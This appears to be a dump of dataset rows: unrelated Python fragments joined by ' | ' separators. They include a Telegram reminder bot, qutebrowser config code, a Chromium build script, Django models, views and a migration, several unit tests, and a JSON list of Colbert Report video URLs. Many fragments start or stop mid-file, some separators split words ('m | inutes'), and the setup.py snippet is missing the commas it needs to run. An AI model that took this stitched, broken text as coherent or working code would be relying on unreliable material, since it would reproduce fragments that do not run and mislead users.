chat = str(chat)
reminders = load_reminders()
msg = ""
reminders = reminders[chat]
for reminder in reminders:
futuretime = time.localtime(float(reminder))
msg += time.strftime("%d/%m/%y as %H:%M:%S", futuretime) + ": " + reminders[reminder] + "\n"
return msg
def add_reminder(chat, date, message):
chat = str(chat)
reminders = load_reminders()
assert type(reminders) is dict
if chat not in reminders:
reminders[chat] = {}
reminders[chat][date] = message
save_reminders(reminders)
def check_time():
reminders = load_reminders()
for chat in reminders:
for date in reminders[chat]:
if float(date) < time.time():
send_message(chat, "O MEU JA DEU ORA D " + reminders[chat][date])
# print(reminders[chat][date])
reminders[chat].pop(date)
save_reminders(reminders)
break
scheduler.enter(1, 1, check_time)
def on_msg_received(msg, matches):
chat = msg["chat"]["id"]
days = matches.group(1)
hours = matches.group(2)
minutes = matches.group(3)
seconds = matches.group(4)
message = matches.group(5)
timeoffset = 0
if days is not None:
days = days.lower().replace("d", "")
timeoffset += 86400 * int(days)
if hours is not None:
hours = hours.lower().replace("h", "")
timeoffset += 3600 * int(hours)
if minutes is not None:
m | inutes = minutes.lower().replace("m", "")
timeoffset += 60 * int(minutes)
if seconds is not None:
seconds = seconds.lower().replace("s", "")
timeoffset += int(seconds)
if days is None and hour | s is None and minutes is None and seconds is None and message is None:
response = list_reminders(chat)
send_message(chat, response)
return
if message is None:
message = "auguna cosa"
futuretime = time.time() + timeoffset
if "username" in msg["from"]:
message += " blz @" + msg["from"]["username"]
add_reminder(chat, futuretime, message)
futuretime = time.localtime(futuretime)
response = "belesinhaaaaa vo lenbra dia " + time.strftime("%d/%m/%y as %H:%M:%S", futuretime) + " sobr \"" + message + "\""
send_message(chat, response)
def run():
scheduler.enter(1, 1, check_time)
scheduler.run()
|
'''
Created on Jun 11, 2011
@author: mkiyer
'''
class Breakpoint(object):
def __init__(self):
self.name = None
| self.seq5p = None
self.seq3p = None
self.chimera_names = []
@property
def pos(self):
"""
return position of break along sequence measured from 5' -> 3'
"""
return len(self.seq5p)
@staticmethod
def from_list(fields):
b = Breakpoint()
b.name = fields[0]
b.seq5p = fields[1]
b.seq3p = | fields[2]
b.chimera_names = fields[3].split(',')
return b
def to_list(self):
fields = [self.name, self.seq5p, self.seq3p]
fields.append(','.join(self.chimera_names))
return fields |
se:
bindings = self.get_bindings_for(mode)
return bindings.get(key, None)
def bind(self,
key: keyutils.KeySequence,
command: str, *,
mode: str,
save_yaml: bool = False) -> None:
"""Add a new binding from key to command."""
if not command.strip():
raise configexc.KeybindingError(
"Can't add binding '{}' with empty command in {} "
'mode'.format(key, mode))
self._validate(key, mode)
log.keyboard.vdebug( # type: ignore[attr-defined]
"Adding binding {} -> {} in mode {}.".format(key, command, mode))
bindings = self._config.get_mutable_obj('bindings.commands')
if mode not in bindings:
bindings[mode] = {}
bindings[mode][str(key)] = command
self._config.update_mutables(save_yaml=save_yaml)
def bind_default(self,
key: keyutils.KeySequence, *,
mode: str = 'normal',
save_yaml: bool = False) -> None:
"""Restore a default keybinding."""
self._validate(key, mode)
bindings_commands = self._config.get_mutable_obj('bindings.commands')
try:
del bindings_commands[mode][str(key)]
except KeyError:
raise configexc.KeybindingError(
"Can't find binding '{}' in {} mode".format(key, mode))
self._config.update_mutables(save_yaml=save_yaml)
def unbind(self,
key: keyutils.KeySequence, *,
mode: str = 'normal',
save_yaml: bool = False) -> None:
"""Unbind the given key in the given mode."""
self._validate(key, mode)
bindings_commands = self._config.get_mutable_obj('bindings.commands')
if val.bindings.commands[mode].get(key, None) is not None:
# In custom bindings -> remove it
del bindings_commands[mode][str(key)]
elif key in val.bindings.default[mode]:
# In default bindings -> shadow it with None
if mode not in bindings_commands:
| bindings_commands[mode] = {}
bindings_commands[mode][str(key)] = None
else:
raise configexc.KeybindingError(
"Can | 't find binding '{}' in {} mode".format(key, mode))
self._config.update_mutables(save_yaml=save_yaml)
class Config(QObject):
"""Main config object.
Class attributes:
MUTABLE_TYPES: Types returned from the config which could potentially
be mutated.
Attributes:
_values: A dict mapping setting names to configutils.Values objects.
_mutables: A dictionary of mutable objects to be checked for changes.
_yaml: A YamlConfig object or None.
Signals:
changed: Emitted with the option name when an option changed.
"""
MUTABLE_TYPES = (dict, list)
changed = pyqtSignal(str)
def __init__(self,
yaml_config: 'configfiles.YamlConfig',
parent: QObject = None) -> None:
super().__init__(parent)
self._mutables: MutableMapping[str, Tuple[Any, Any]] = {}
self._yaml = yaml_config
self._init_values()
self.yaml_loaded = False
self.config_py_loaded = False
self.warn_autoconfig = True
def _init_values(self) -> None:
"""Populate the self._values dict."""
self._values: Mapping = {}
for name, opt in configdata.DATA.items():
self._values[name] = configutils.Values(opt)
def __iter__(self) -> Iterator[configutils.Values]:
"""Iterate over configutils.Values items."""
yield from self._values.values()
def init_save_manager(self,
save_manager: 'savemanager.SaveManager') -> None:
"""Make sure the config gets saved properly.
We do this outside of __init__ because the config gets created before
the save_manager exists.
"""
self._yaml.init_save_manager(save_manager)
def _set_value(self,
opt: 'configdata.Option',
value: Any,
pattern: urlmatch.UrlPattern = None,
hide_userconfig: bool = False) -> None:
"""Set the given option to the given value."""
if not isinstance(objects.backend, objects.NoBackend):
if objects.backend not in opt.backends:
raise configexc.BackendError(opt.name, objects.backend,
opt.raw_backends)
opt.typ.to_py(value) # for validation
self._values[opt.name].add(opt.typ.from_obj(value),
pattern, hide_userconfig=hide_userconfig)
self.changed.emit(opt.name)
log.config.debug("Config option changed: {} = {}".format(
opt.name, value))
def _check_yaml(self, opt: 'configdata.Option', save_yaml: bool) -> None:
"""Make sure the given option may be set in autoconfig.yml."""
if save_yaml and opt.no_autoconfig:
raise configexc.NoAutoconfigError(opt.name)
def read_yaml(self) -> None:
"""Read the YAML settings from self._yaml."""
self._yaml.load()
self.yaml_loaded = True
for values in self._yaml:
for scoped in values:
self._set_value(values.opt, scoped.value,
pattern=scoped.pattern)
def get_opt(self, name: str) -> 'configdata.Option':
"""Get a configdata.Option object for the given setting."""
try:
return configdata.DATA[name]
except KeyError:
deleted = name in configdata.MIGRATIONS.deleted
renamed = configdata.MIGRATIONS.renamed.get(name)
exception = configexc.NoOptionError(
name, deleted=deleted, renamed=renamed)
raise exception from None
def ensure_has_opt(self, name: str) -> None:
"""Raise NoOptionError if the given setting does not exist."""
self.get_opt(name)
def get(self,
name: str,
url: QUrl = None, *,
fallback: bool = True) -> Any:
"""Get the given setting converted for Python code.
Args:
fallback: Use the global value if there's no URL-specific one.
"""
opt = self.get_opt(name)
obj = self.get_obj(name, url=url, fallback=fallback)
return opt.typ.to_py(obj)
def _maybe_copy(self, value: Any) -> Any:
"""Copy the value if it could potentially be mutated."""
if isinstance(value, self.MUTABLE_TYPES):
# For mutable objects, create a copy so we don't accidentally
# mutate the config's internal value.
return copy.deepcopy(value)
else:
# Shouldn't be mutable (and thus hashable)
assert value.__hash__ is not None, value
return value
def get_obj(self,
name: str, *,
url: QUrl = None,
fallback: bool = True) -> Any:
"""Get the given setting as object (for YAML/config.py).
Note that the returned values are not watched for mutation.
If a URL is given, return the value which should be used for that URL.
"""
self.ensure_has_opt(name)
value = self._values[name].get_for_url(url, fallback=fallback)
return self._maybe_copy(value)
def get_obj_for_pattern(
self, name: str, *,
pattern: Optional[urlmatch.UrlPattern]
) -> Any:
"""Get the given setting as object (for YAML/config.py).
This gets the overridden value for a given pattern, or
usertypes.UNSET if no such override exists.
"""
self.ensure_has_opt(name)
value = self._values[name].get_for_pattern(pattern, fallback=False)
return self._maybe_copy(value)
def get_mutable_obj(self, name: str, *,
pattern: urlmatch.UrlPattern = None) -> Any:
"""Get an object which can be mutated, e.g. in a config.py.
If a pattern is given |
#!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Gets and writes the configurations of the attached | devices.
This configuration is used by later build steps to determine which devices to
install to and what needs to be installed to those devices.
"""
import optparse
import sys
from util import build_utils
from util import build_device
def main(argv):
parser = optparse.OptionParser()
parser.add_option('--stamp', action='store')
parser.add_option('--output', action='store')
options, _ = p | arser.parse_args(argv)
devices = build_device.GetAttachedDevices()
device_configurations = []
for d in devices:
configuration, is_online, has_root = (
build_device.GetConfigurationForDevice(d))
if not is_online:
build_utils.PrintBigWarning(
'%s is not online. Skipping managed install for this device. '
'Try rebooting the device to fix this warning.' % d)
continue
if not has_root:
build_utils.PrintBigWarning(
'"adb root" failed on device: %s\n'
'Skipping managed install for this device.'
% configuration['description'])
continue
device_configurations.append(configuration)
if len(device_configurations) == 0:
build_utils.PrintBigWarning(
'No valid devices attached. Skipping managed install steps.')
elif len(devices) > 1:
# Note that this checks len(devices) and not len(device_configurations).
# This way, any time there are multiple devices attached it is
# explicitly stated which device we will install things to even if all but
# one device were rejected for other reasons (e.g. two devices attached,
# one w/o root).
build_utils.PrintBigWarning(
'Multiple devices attached. '
'Installing to the preferred device: '
'%(id)s (%(description)s)' % (device_configurations[0]))
build_device.WriteConfigurations(device_configurations, options.output)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
'''
Test particle generator, that the resulting PSD curve matches the one on input.
'''
import unittest
from woo.core import *
from woo.dem import *
from minieigen import *
import numpy
class PsdSphereGeneratorTest(unittest.TestCase):
def setUp(self):
self.gen=PsdSphereGenerator(psdPts=[(.05,0),(.1,20),(.2,40),(.4,60),(.5,90),(.6,100)])
self.mat=FrictMat(density=1000)
def testMassDiscrete(self):
'PSD: discrete mass-based generator'
self.gen.mass=True; self.gen.discrete=True
self.checkOk()
def testMassContinuous(self):
'PSD: continuous mass-based generator'
self.gen.mass=True; self.gen.discrete=False
self.checkOk(relDeltaInt=.03,relDeltaD=.1)
def testNumDiscrete(self):
'PSD: discrete number-based generator'
self.gen.mass=False; self.gen.discrete=True
self.checkOk()
def testNumContinuous(self):
'PSD: continuo | us number-based generator'
self.gen.mass=False; self.gen.discrete=False
self.checkOk()
def testMonodis | perse(self):
'PSD: monodisperse packing'
self.gen.psdPts=[(.05,0),(.05,1)]
self.gen.mass=True; self.gen.discrete=False
# this cannot be checked with numpy.trapz, do it manually
for i in range(10000): self.gen(self.mat)
(id,im),(od,om)=self.gen.inputPsd(normalize=False),self.gen.psd(normalize=False)
self.assert_(id[0]==id[-1])
self.assertAlmostEqual(im[-1],om[-1],delta=.04*im[-1])
def testClippingSpuriousPoints(self):
'PSD: clipping spurious values'
self.gen.psdPts=[(0,0),(1,0),(5,5)]
res=[(1,0),(5,1)]
self.assert_(self.gen.psdPts==res)
self.gen.psdPts=[(1,0),(5,2),(5,2),(5,2)]
self.assert_(self.gen.psdPts==res)
def testPsdTimeRange(self):
'PSD: time range for computing PSD'
# generate radii in different ranges at t=0 and t=1
self.gen.psdPts=[(.1,0),(.2,1)]
for i in range(50): self.gen(self.mat,0)
self.gen.psdPts=[(1,0),(2,1)]
for i in range(50): self.gen(self.mat,1)
# now check that max and min in that time correspond
psdA=self.gen.psd(normalize=True,num=10,tRange=(0,.5))
psdB=self.gen.psd(normalize=True,num=10,tRange=(.5,2.))
self.assert_(psdA[0][0]<.2 and psdA[0][-1]>.1)
self.assert_(psdB[0][0]<2 and psdB[0][-1]>1.)
def checkOk(self,relDeltaInt=.02,relDeltaD=.04):
for i in range(10000): self.gen(self.mat)
iPsd=self.gen.inputPsd(normalize=False)
iPsdNcum=self.gen.inputPsd(normalize=False,cumulative=False,num=150)
# scale by mass rather than number depending on the generator setup
oPsd=self.gen.psd(mass=self.gen.mass,normalize=False,num=150)
oPsdNcum=self.gen.psd(mass=self.gen.mass,normalize=False,num=150,cumulative=False)
iInt=numpy.trapz(*iPsd)
oInt=numpy.trapz(*oPsd)
if 0: # enable to show graphical output
import pylab
pylab.figure()
pylab.subplot(211)
pylab.plot(*iPsd,label='in (%g)'%iInt)
pylab.plot(*oPsd,label='out (%g)'%oInt)
desc=('mass' if self.gen.mass else 'num','discrete' if self.gen.discrete else 'continuous')
pylab.suptitle('%s-based %s generator (rel. area err %g)'%(desc[0],desc[1],(oInt-iInt)/iInt))
# pylab.xlabel('Particle diameter')
pylab.ylabel('Cumulative '+('mass' if self.gen.mass else 'number of particles'))
pylab.grid(True)
pylab.legend(loc='upper left')
pylab.subplot(212)
pylab.plot(*iPsdNcum,label='in')
pylab.plot(*oPsdNcum,label='out')
desc=('mass' if self.gen.mass else 'num','discrete' if self.gen.discrete else 'continuous')
pylab.suptitle('%s-based %s generator (rel. area err %g)'%(desc[0],desc[1],(oInt-iInt)/iInt))
pylab.xlabel('Particle diameter')
pylab.ylabel('Histogram: '+('mass' if self.gen.mass else 'number of particles'))
pylab.grid(True)
pylab.legend(loc='upper left')
pylab.savefig('/tmp/psd-test-%s-%s.png'%desc)
# tolerance of 1%
self.assertAlmostEqual(iInt,oInt,delta=relDeltaInt*iInt)
# check that integration minima and maxima match
dMin,dMax=self.gen.psdPts[0][0],self.gen.psdPts[-1][0]
# minimum diameter for discrete PSDs is the first one with fraction > 0
if self.gen.discrete: dMin=[dd[0] for dd in self.gen.psdPts if dd[1]>0][0]
# 3% tolerance here
self.assertAlmostEqual(dMin,oPsd[0][0],delta=relDeltaD*dMin)
self.assertAlmostEqual(dMax,oPsd[0][-1],delta=relDeltaD*dMax)
class BiasedPositionTest(unittest.TestCase):
def testAxialBias(self):
'Inlet: axial bias'
bb=AxialBias(axis=0,d01=(2,1),fuzz=.1)
d0,d1=bb.d01
for d in numpy.linspace(.5,2.5):
p=bb.unitPos(d)[0]
pMid=numpy.clip((d-d0)/(d1-d0),0,1)
self.assert_(abs(p-pMid)<=bb.fuzz/2.)
|
# -*- | coding: utf-8 -*-
'''
Created on 18 oct 2013
@author: franck
'''
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from movesevent.models.movesApp import MovesApp
class MovesUser(models.Model):
" | ""
Moves user profile.
"""
user = models.ForeignKey(User)
app = models.ForeignKey(MovesApp)
last_modified = models.DateTimeField(_(u"Last modification date"), auto_now=True, blank=True) # Automatic import date
created_date = models.DateTimeField(_(u"Creation date"),auto_now_add=True, blank=True)
access_token = models.CharField(max_length=255, null=True, blank=True)
"""
Moves access token
"""
def __unicode__(self):
return '%s/%s' % (self.user.username, self.app.app_name);
# Cela semble obligatoire pour la generation de la base
class Meta:
app_label='movesevent'
unique_together = (("user", "app"),)
verbose_name = "Moves user" |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, m | igrations
class Migration(migrations.Migration):
dependencies = [
('main', '0012_auto_20160204_1503'),
]
operations = [
migrations.AlterModelOptions(
name='eventassignment',
options={'permissions': (('can_be_assigned', 'Can be assigned to events'),)},
),
migrations.AlterField(
model_name='suggestedevent',
name='status',
field=models.CharField(default=b'created', max_length=40, choices=[(b'created', b | 'Created'), (b'submitted', b'Submitted'), (b'resubmitted', b'Resubmitted'), (b'rejected', b'Bounced back'), (b'retracted', b'Retracted'), (b'accepted', b'Accepted'), (b'removed', b'Removed')]),
preserve_default=True,
),
migrations.AlterField(
model_name='template',
name='content',
field=models.TextField(help_text=b"The HTML framework for this template. Use <code>{{ any_variable_name }}</code> for per-event tags. Other Jinja2 constructs are available, along with the related <code>request</code>, <code>datetime</code>, <code>event</code> objects, and the <code>md5</code> function. You can also reference <code>autoplay</code> and it's always safe. Additionally we have <code>vidly_tokenize(tag, seconds)</code>, <code>edgecast_tokenize([seconds], **kwargs)</code> and <code>akamai_tokenize([seconds], **kwargs)</code><br> Warning! Changes affect all events associated with this template."),
preserve_default=True,
),
]
|
i | mport f | oo, bar |
# Copyright 2016 David Lapsley
#
# Licensed under the Apache License, Version 2.0 (the "License" | );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License | .
import jira
import source
import unittest
import mock
class TestSource(unittest.TestCase):
@mock.patch('jira.JIRA.__init__',
mock.Mock(return_value=None))
@mock.patch('jira.JIRA.search_issues',
mock.Mock(return_value=[0, 1, 2, 3]))
def test_something(self):
server = 'server'
user = 'user'
password = 'password'
jql = ''
s = source.JIRASource(server, user, password, jql)
idx = 0
for i in s:
self.assertEqual(i, idx)
idx += 1
if __name__ == '__main__':
unittest.main() |
.cc.com/videos/wanzdw/who-s-riding-my-coattails-now----jeopardy",
"http://thecolbertreport.cc.com/videos/bp43w6/the-word---killing-two-birds",
"http://thecolbertreport.cc.com/videos/49jjmd/alabama-miracle---the-stephen-colbert-museum---gift-shop--grand-opening",
"http://thecolbertreport.cc.com/videos/8rjs2g/nora-ephron"
],
"guest": "Nora Ephron"
},
{
"date": "2006-11-30",
"videos": [
"http://thecolbertreport.cc.com/videos/wzpzqs/intro---11-30-06",
"http://thecolbertreport.cc.com/videos/4c2tdv/vilsack-attack",
"http://thecolbertreport.cc.com/videos/z88s3n/p-k--winsome---if-p-k--winsome-did-it",
"http://thecolbertreport.cc.com/videos/0inrmr/colbert-nation-merchandise",
"http://thecolbertreport.cc.com/videos/jotybg/alabama-miracle---the-morning-after",
"http://thecolbertreport.cc.com/videos/hv1lim/mike-lupica",
"http://thecolbertreport.cc.com/videos/k1wdp2/sign-off---wall-notch"
],
"guest": "Mike Lupica"
},
{
"date": "2006-12-04",
"videos": [
"http://thecolbertreport.cc.com/videos/9s5cs9/intro---12-4-06",
"http://thecolbertreport.cc.com/videos/ozd0a8/sherman-wedding",
"http://thecolbertreport.cc.com/videos/sjup2k/the-word---american-orthodox",
"http://thecolbertreport.cc.com/videos/shtpb9/tip-wag---christmas",
"http://thecolbertreport.cc.com/videos/tc5d1m/will-wright",
"http://thecolbertreport.cc.com/videos/xpx8ua/sign-off---extra-special-comment---tie-stain"
],
"guest": "Will Wright"
},
{
"date": "2006-12-05",
"videos": [
"http://thecolbertreport.cc.com/videos/z40k91/intro---12-5-06",
"http://thecolbertreport.cc.com/videos/6ixmt6/-return--to-the-moon",
"http://thecolbertreport.cc.com/videos/mz0h4p/robert-gates--confirmation",
"http://thecolbertreport.cc.com/videos/msrwcg/the-word---honest-injun",
"http://thecolbertreport.cc.com/videos/3odbkp/sport-report---coach-mancini",
"http://thecolbertreport.cc.com/videos/tjdbeu/sign-off---number-one-source",
"http://thecolbertreport.cc.com/videos/c1sa92/steven-levitt"
],
"guest": "Steven D. Leavitt"
},
{
"date": "2006-12-06",
"videos": [
"http://thecolbertreport.cc.com/videos/fe08hq/intro---12-6-06",
"http://thecolbertreport.cc.com/videos/oamjbp/life-size-nativity",
"http://the | colbertreport.cc.com/videos/ikcmp0/mary-cheney",
"http://thecolbertreport.cc.com/videos/4fr9o9/the-word---words",
"http://thecolbertreport.cc.com/videos/76wnkt/tek-jansen---tek-the-halls",
"http://thecolbertreport.cc.com/videos/0wq | kww/john-sexton",
"http://thecolbertreport.cc.com/videos/8suoui/sign-off---cardboard-box"
],
"guest": "John Sexton"
},
{
"date": "2006-12-07",
"videos": [
"http://thecolbertreport.cc.com/videos/k9wcbv/intro---12-7-06",
"http://thecolbertreport.cc.com/videos/ebabt9/david-gregory",
"http://thecolbertreport.cc.com/videos/kvccyn/the-word---case-closed",
"http://thecolbertreport.cc.com/videos/tk750r/elizabeth-de-la-vega",
"http://thecolbertreport.cc.com/videos/dntxcy/green-screen-challenge---counter-challenge",
"http://thecolbertreport.cc.com/videos/4koanp/alpha-dog-of-the-week---john-bolton",
"http://thecolbertreport.cc.com/videos/dqyz7h/francis-collins",
"http://thecolbertreport.cc.com/videos/rqe98q/sign-off---tgit"
],
"guest": "Dr. Francis S. Collins"
},
{
"date": "2006-12-11",
"videos": [
"http://thecolbertreport.cc.com/videos/ri4vbo/intro---12-11-06",
"http://thecolbertreport.cc.com/videos/t0abnh/defending-rosie",
"http://thecolbertreport.cc.com/videos/uea9ov/jack-kingston",
"http://thecolbertreport.cc.com/videos/k0a3hu/the-white-christmas-album",
"http://thecolbertreport.cc.com/videos/2cea2e/threatdown---christmas-style",
"http://thecolbertreport.cc.com/videos/bqpkoy/peter-singer",
"http://thecolbertreport.cc.com/videos/5alg6c/got-your-back"
],
"guest": "Dr. Peter Singer"
},
{
"date": "2006-12-12",
"videos": [
"http://thecolbertreport.cc.com/videos/35u0ts/intro---12-12-06",
"http://thecolbertreport.cc.com/videos/kn0mlp/augusto-pinochet-s-coup",
"http://thecolbertreport.cc.com/videos/dctycd/shout-out----beef-hammer-flag",
"http://thecolbertreport.cc.com/videos/1o4xvk/the-word---casualty-of-war",
"http://thecolbertreport.cc.com/videos/e1504w/who-s-honoring-me-now----merriam-webster-s-word-of-the-year",
"http://thecolbertreport.cc.com/videos/xd9itr/better-know-a-district---new-members-of-congress-at-the-kennedy-school",
"http://thecolbertreport.cc.com/videos/j01zz1/dan-savage",
"http://thecolbertreport.cc.com/videos/s3gs7u/sign-off---post-show-taco-bell-chalupa-chow-down"
],
"guest": "Dan Savage"
},
{
"date": "2006-12-13",
"videos": [
"http://thecolbertreport.cc.com/videos/6ohkja/intro---12-13-06",
"http://thecolbertreport.cc.com/videos/yl018s/stephen-jr--s-christmas-miracle",
"http://thecolbertreport.cc.com/videos/suc40d/the-word---it-s-a-small-world",
"http://thecolbertreport.cc.com/videos/5uk9gs/replenishing-the-eggnog-supply",
"http://thecolbertreport.cc.com/videos/d0ml1u/sea-tac-s-christmas-trees-restored",
"http://thecolbertreport.cc.com/videos/x1f8dg/doris-kearns-goodwin",
"http://thecolbertreport.cc.com/videos/0kcywr/charge-me-twice-for-stephen"
],
"guest": "Doris Kearns Goodwin"
},
{
"date": "2006-12-14",
"videos": [
"http://thecolbertreport.cc.com/videos/lwojc9/intro---12-14-06",
"http://thecolbertreport.cc.com/videos/3moulc/finger-strengthening",
"http://thecolbertreport.cc.com/videos/5dvej7/the-american-people-are-to-blame",
"http://thecolbertreport.cc.com/videos/60ds73/the-word---clarity",
"http://thecolbertreport.cc.com/videos/klp05i/blood-in-the-water---bruce-tinsley-s-dui",
"http://thecolbertreport.cc.com/videos/wauy3f/caesar-honeybee-or-tyrone-hunnibi-",
"http://thecolbertreport.cc.com/videos/yaoen5/daniel-pinchbeck",
"http://thecolbertreport.cc.com/videos/ua9gte/letter-to-representative-jack-kingston"
],
"guest": "Daniel Pinchbeck"
},
{
"date": "2006-12-18",
"videos": [
"http://thecolbertreport.cc.com/videos/t66x66/intro---12-18-06",
"http://thecolbertreport.cc.com/videos/j56gn9/diy-cold-medicine",
"http://thecolbertreport.cc.com/videos/ndrsqu/profiles-in-balls",
"http://thecolbertreport.cc.com/videos/mv0dai/the-word---the-draft",
"http://thecolbertreport.cc.com/videos/c4vji3/tip-wag---art-edition",
"http://thecolbertreport.cc.com/videos/nnpc32/jack-welch",
"http://thecolbertreport.cc.com/videos/yy82av/the-jingle-terns"
],
"guest": "Jack Welch"
},
{
"date": "2006-12-19",
"videos": [
"http://thecolbertreport.cc.com/videos/an4q7j/intro---12-19-06",
"http://thecolbertreport.cc.com/videos/q9o6sw/person-of-the-year",
"http://thecolbertreport.cc.com/videos/qh5kz9/stephen-goes-to-harvard",
"http://thecolbertreport.cc.com/videos/v81egv/deepak-chopra",
"http://thecolbertreport.cc.com/videos/3fhkpv/face-off-preview",
"http://thecolbertreport.cc.com/videos/kza2d8/the-word---tit-for-tat"
],
"guest": "Deepak Chopra"
},
{
"date": "2006-12-20",
"videos": [
"http://thecolbertreport.cc.com/videos/ouau0r/intro---12-20-06",
"http://thecolbertreport.cc.com/videos/8t5vas/rock-and-awe--countdown-to-guitarmageddon",
"http://thecolbertreport.cc.com/videos/lyahfg/shreddown",
"http://thecolbertreport.cc.com/videos/iocz1g/chris-funk",
"http://thecolbertreport.cc.com/videos/4hpbzt/peter-frampton",
"http://thecolbertreport.cc.com/videos/m75mj |
import os, sys; sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
import pytest
from lasio import read
test_dir = os.path.dirname(__file__)
egfn = lambda fn: os.path.join(os.path.dirname(__file__), "examples", fn)
def test_open_url():
l = read("https://raw.githubusercontent.com/kinverarity1/"
"lasio/master/standard | s/examples"
"/1.2/sample_curve_api.las")
def test_open_file_object():
with open(egfn("sample.las"), mode="r") as f:
l = read(f)
def test_open_filenam | e():
l = read(egfn("sample.las"))
def test_open_incorrect_filename():
with pytest.raises(OSError):
l = read(egfn("sampleXXXDOES NOT EXIST.las"))
def test_open_string():
l = read("""~VERSION INFORMATION
VERS. 1.2: CWLS LOG ASCII STANDARD -VERSION 1.2
WRAP. NO: ONE LINE PER DEPTH STEP
~WELL INFORMATION BLOCK
#MNEM.UNIT DATA TYPE INFORMATION
#--------- ------------- ------------------------------
STRT.M 1670.000000:
STOP.M 1660.000000:
STEP.M -0.1250:
NULL. -999.2500:
COMP. COMPANY: # ANY OIL COMPANY LTD.
WELL. WELL: ANY ET AL OIL WELL #12
FLD . FIELD: EDAM
LOC . LOCATION: A9-16-49-20W3M
PROV. PROVINCE: SASKATCHEWAN
SRVC. SERVICE COMPANY: ANY LOGGING COMPANY LTD.
DATE. LOG DATE: 25-DEC-1988
UWI . UNIQUE WELL ID: 100091604920W300
~CURVE INFORMATION
#MNEM.UNIT API CODE CURVE DESCRIPTION
#--------- ------------- ------------------------------
DEPT.M : 1 DEPTH
DT .US/M : 2 SONIC TRANSIT TIME
RHOB.K/M3 : 3 BULK DENSITY
NPHI.V/V : 4 NEUTRON POROSITY
SFLU.OHMM : 5 RXO RESISTIVITY
SFLA.OHMM : 6 SHALLOW RESISTIVITY
ILM .OHMM : 7 MEDIUM RESISTIVITY
ILD .OHMM : 8 DEEP RESISTIVITY
~PARAMETER INFORMATION
#MNEM.UNIT VALUE DESCRIPTION
#--------- ------------- ------------------------------
BHT .DEGC 35.5000: BOTTOM HOLE TEMPERATURE
BS .MM 200.0000: BIT SIZE
FD .K/M3 1000.0000: FLUID DENSITY
MATR. 0.0000: NEUTRON MATRIX(0=LIME,1=SAND,2=DOLO)
MDEN. 2710.0000: LOGGING MATRIX DENSITY
RMF .OHMM 0.2160: MUD FILTRATE RESISTIVITY
DFD .K/M3 1525.0000: DRILL FLUID DENSITY
~Other
Note: The logging tools became stuck at 625 meters causing the data
between 625 meters and 615 meters to be invalid.
~A DEPTH DT RHOB NPHI SFLU SFLA ILM ILD
1670.000 123.450 2550.000 0.450 123.450 123.450 110.200 105.600
1669.875 123.450 2550.000 0.450 123.450 123.450 110.200 105.600
1669.750 123.450 2550.000 0.450 123.450 123.450 110.200 105.600
""")
|
"""bla"""
# pylint: disable=no-absolute- | import
__revision__ = 'yo'
from input import func_w0233
class Aaaa(func_w0233.AAAA):
"""test dotted name in ancestors"""
def | __init__(self):
func_w0233.AAAA.__init__(self)
|
#####################################################################
# -*- coding: iso-8859-1 -*- #
# #
# Frets on Fire #
# Copyright (C) 2006 Sami Kyöstilä #
# #
# This program is free software; you can redistribute it and/or #
# modify it under the terms of the GNU General Public License #
# as published by the Free Software Foundation; either version 2 #
# of the License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty o | f #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program; if not, write to the Free Software #
| # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #
# MA 02110-1301, USA. #
#####################################################################
import unittest
import Network
import time
class TestConnection(Network.Connection):
def handlePacket(self, packet):
self.packet = packet
class TestServer(Network.Server):
def createConnection(self, sock):
return TestConnection(sock)
class NetworkTest(unittest.TestCase):
def testHandshake(self):
s = TestServer()
c = TestConnection()
c.connect("localhost")
c.sendPacket("moikka")
Network.communicate(100)
client = s.clients.values()[0]
assert client.packet == "moikka"
assert client.id == 1
def tearDown(self):
Network.shutdown()
if __name__ == "__main__":
unittest.main()
|
from distutils.core import setup
setup (
name = 'quaternion_class'
author | = 'Matthew Nichols'
author_email = 'mattnichols@gmail.com'
packages = ['quaternion']
package_dir = {'quaternion':s | rc}
) |
from | django.shortcuts import render
from django.conf.urls import patterns, url
from django.core.urlresolvers import reverse_lazy
from django.views.generic import TemplateView
from django.contrib.auth.decorators import login_required
from edamame import base, utils, generic
from | . import models
class SiteViews(base.Views):
def index(self, request):
"""view function
"""
return render(request, 'index.html')
test_page = utils.to_method(
TemplateView.as_view(template_name='test_page.html'))
def get_urls(self):
urlpatterns = patterns(
'',
url(r'^$', self.wrap_view(self.index), name='index'),
url(r'^test_page$',
self.wrap_view(self.test_page), name='test_page'),
)
return urlpatterns
site_views = SiteViews()
class NoteViews(generic.ModelViews):
model = models.Note
success_url = reverse_lazy('note:index')
note_views = NoteViews()
class MembersOnlyViews(base.Views):
members_only = utils.to_method(render, template_name='members_only.html')
view_decorators = (
(login_required, (), {'login_url': 'auth:login'}),
)
def get_urls(self):
urlpatterns = patterns(
'',
url(r'^$', self.wrap_view(self.members_only), name='members_only'),
)
return urlpatterns
members_only_views = MembersOnlyViews()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.